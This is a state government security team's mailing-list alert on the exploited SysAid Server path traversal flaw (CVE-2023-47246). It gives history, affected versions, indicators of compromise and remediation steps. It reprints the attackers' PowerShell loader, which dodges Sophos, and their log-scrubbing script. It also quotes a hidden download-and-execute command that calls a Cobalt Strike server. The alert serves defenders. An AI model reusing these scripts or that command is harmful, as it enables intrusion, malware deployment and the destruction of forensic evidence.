[CDP-development] TLP:GREEN - (Vulnerability Alert Notification) - CVE-2023-47246 SysAid Server Path Traversal Vulnerability

CSS Security Operations Services * DAS css-soc-services at das.oregon.gov
Mon Nov 13 10:20:55 PST 2023 

Good morning,

The SOC Services team is reporting on the vulnerability: CVE-2023-47246 SysAid Server Path Traversal Vulnerability. Due to its high visibility and knowledge of the software installed in the state environment, we are providing this in-depth information:

History: On November 8, 2023, SysAid published an advisory expressing that their on-premise server software had a previously undisclosed vulnerability and is aware of public in-the-wild exploitation. Days prior, Microsoft had notified SysAid of this issue and that they attributed these compromises to TA505 "Lace Tempest", often known as the cl0p ransomware gang. On November 13, 2023, CISA added CVE-2023-47246 to the Known Exploited Vulnerabilities Catalog.

The following products are affected:

  *   SysAid Server prior to 23.3.36
Fixed version:

  *   SysAid Server 23.3.36

SysAid has provided an advisory which can be found here: https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification

Intelligence: As of November 8, 2023, the vulnerability has been confirmed as being exploited in the wild.

Workarounds: There are no workarounds at this time.

How it works: The attacker uploads a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The attacker then uses a Powershell script to deploy the WebShell which executes a malware loader named user.exe which loads the GraceWire trojan injecting into one of the processes listed below:


  *   Spoolsv.exe
  *   msiexec.exe
  *   svchost.exe

After initial access the attackers utilized a second PowerShell script to erase evidence associated with the attacker's actions from the disk and the SysAid on-prem server web logs.

The following PowerShell script was used to launch the user.exe loader:
$wapps='C:\Program Files\SysAidServer\tomcat\webapps'
dir "$wapps\usersfiles"
$bp=0
foreach($s in tasklist) {
  if ($s -match '^(Sophos).*\.exe\s') {echo $s; $bp++;}
}
if ($bp) { echo "`nSTOP-PROCs FOUND! Exiting`n" }
else {
  echo "Starting user.exe"
& "$wapps\usersfiles\user.exe"
}
Start-Sleep 1
Remove-Item -Force "$wapps\usersfiles.war"
Remove-Item -Force "$wapps\usersfiles\user.*"
exi

The script performs the following actions:


  *   Lists all files placed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory.
  *   Checks all running processes for any process beginning with the name "Sophos" and if found, exits.
  *   If no matching processes are found, starts the user.exe malware.
  *   Pauses for a second, and then removes any files used during the attack, including the usersfiles.war file and any files matching C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.*

The following PowerShell script was used to erase evidence:
$tomcat_dir = "E:\SysAidServer\tomcat";
$log4j_dir = "E:\SysAidServer\root\WEB-INF\logs";
$log4jPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";
$tcPattern = "userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731";
function cleanLL {
$fl = Get-ChildItem "$log4j_dir";
for ($i=0; $i -lt $fl.Count; $i++) {
     $logFile = $fl[$i].FullName;
     if (Select-String -Pattern "$log4jPattern" -Path "$logFile") {
         Get-Content -Path "$logFile" | Select-String -Pattern "$log4jPattern" -NotMatch | Set-Content -Path "$logFile.bck";
         cp "$logFile.bck" "$logFile"
     }
}
$fl = Get-ChildItem "$tomcat_dir\logs\";
for ($i=0; $i -lt $fl.Count; $i++) {
     $logFile = $fl[$i].FullName;
     if (Select-String -Pattern "$tcPattern" -Path "$logFile") {
         Get-Content -Path "$logFile" | Select-String -Pattern "$tcPattern" -NotMatch | Set-Content -Path "$logFile.bck";
         cp "$logFile.bck" "$logFile"
     }
}
}
sleep 5;
cleanLL;
while(1) {
sleep 5;
if(!(Test-Path "$tomcat_dir\webapps\usersfiles.war")) {
     while((Test-Path "$tomcat_dir\webapps\usersfiles")) {
         sleep 1;
     }
     cleanLL;
     break;
}
if((Test-Path "$tomcat_dir\webapps\usersfiles\leave")) {
     Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave";
     sleep 5;
     cleanLL;
     break;
}
else {
     cleanLL;
}
$s=$env:SehCore;$env:SehCore="";Invoke-Expression $s;

The script performs the following actions:


  *   Sleeps for 5 seconds to allow time for the exploit to complete fully.
  *   Removes any lines in log files found within the SysAidServer\root\WEB-INF\logs and SysAidServer\tomcat\logs directories which match the following patterns:
     *   userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=18686488731
     *   userentry|getLogo\.jsp|Got\ LDAP\ file|ldapSyms|usersfile|time=1868648873

The following PowerShell command was used to download and execute a CobaltStrike listener on victim hosts:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://179.60.150[.]34:80/a')

Post-Exploit: Indicators of compromise can be found below:

Hashes
Filename
Sha256
Comment
User.exe
b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d
Malicious loader

IP Addresses

IP
Comment
81.19.138[.]52
GraceWire Loader C2
45.182.189[.]100
GraceWire Loader C2
179.60.150[.]34
Cobalt Strike C2
45.155.37[.]105
Meshagent remote admin tool C2

File Paths

Path
Comment
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe
GraceWire
C:\Program Files\SysAidServer\tomcat\webapps\usersfiles.war
Archive of WebShells and tools used by the attacker
C:\Program Files\SysAidServer\tomcat\webapps\leave
Used as a flag for the attacker scripts during execution

Antivirus Detections
Microsoft Defender detects the components of this attack as the following threats:

  *   Trojan:Win32/TurtleLoader
  *   Backdoor:Win32/Clop
  *   Ransom:Win32/Clop
Post-Compromise Cleanup
After initial compromise, the attacker cleans up payloads used to establish an initial foothold on the infected servers, evidence of the following commands being run on SysAid servers indicates successful exploitation:
Remove-Item -Path "$tomcat_dir\webapps\usersfiles\leave".
Remove-Item -Force "$wapps\usersfiles.war".
Remove-Item -Force "$wapps\usersfiles\user.*".
& "$wapps\usersfiles\user.exe".
As of November 13, 2023, there are no Tenable plugins for this vulnerability as well as no plugins in the pipeline.
Recommended Actions:


  *   Verify host has not been compromised before applying patches.
  *   Apply appropriate updates provided by vendor to vulnerable systems immediately after appropriate testing.
  *   Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.
  *   Apply the Principle of Least Privilege to all systems and services.



[cid:image001.png at 01DA1614.36201480]
Cyber Security Services
State of Oregon Cyber Security Services
Enterprise Information Services | SOC
Cyber Security Services (CSS)
SOC Hotline: (503) 378-5930 | SOC Services (503) 373-0378
"Ensuring user-friendly, reliable and secure state technology systems that serve Oregonians."


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20231113/8ad098b0/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 21907 bytes
Desc: image001.png
URL: <https://omls.oregon.gov/pipermail/cdp-development/attachments/20231113/8ad098b0/attachment-0001.png>

More information about the CDP-development mailing list